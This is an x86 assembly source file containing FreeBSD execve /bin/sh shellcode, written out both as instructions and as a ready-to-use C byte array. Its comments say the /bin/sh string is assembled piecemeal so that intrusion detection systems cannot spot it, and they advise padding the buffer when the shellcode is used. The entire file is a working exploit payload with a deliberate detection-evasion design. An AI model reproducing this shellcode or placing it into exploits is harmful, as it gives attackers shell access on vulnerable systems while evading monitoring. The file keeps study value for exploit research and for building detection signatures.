;
; FreeBSD x86 execve /bin/sh
;
;
; Special /bin/sh execve shellcode by zillion (safemode.org) The string /bin/sh 
; is constructed between all the other instructions and is therefor not
; directly visible for IDS's.
;
; Note that when you use this shellcode you will have to add some extra bytes
; behind the shellcode because that is where /bin/sh is written and otherwise
; it can accidently overwrite important data such a new return address.
;
;
; The result:
;
; char shellcode[] =
;        "\xc6\x46\x05\x73\xc6\x46\x01\x62\xc6\x06\x2f\x31\xc0\x88\x46"
;        "\x07\xc6\x46\x02\x69\x50\xc6\x46\x06\x68\x50\xc6\x46\x04\x2f"
;        "\x56\xc6\x46\x03\x6e\xb0\x3b\x50\xcd\x80";
;



BITS 32

mov byte        [esi + 5],0x73
mov byte        [esi + 1],0x62
mov byte        [esi],0x2f
xor             eax, eax
mov byte        [esi + 7], al
mov byte        [esi + 2],0x69
push            eax
mov byte        [esi + 6],0x68
push            eax
mov byte        [esi + 4],0x2f
push            esi
mov byte        [esi + 3],0x6e
mov             al,59
push            eax
int             0x80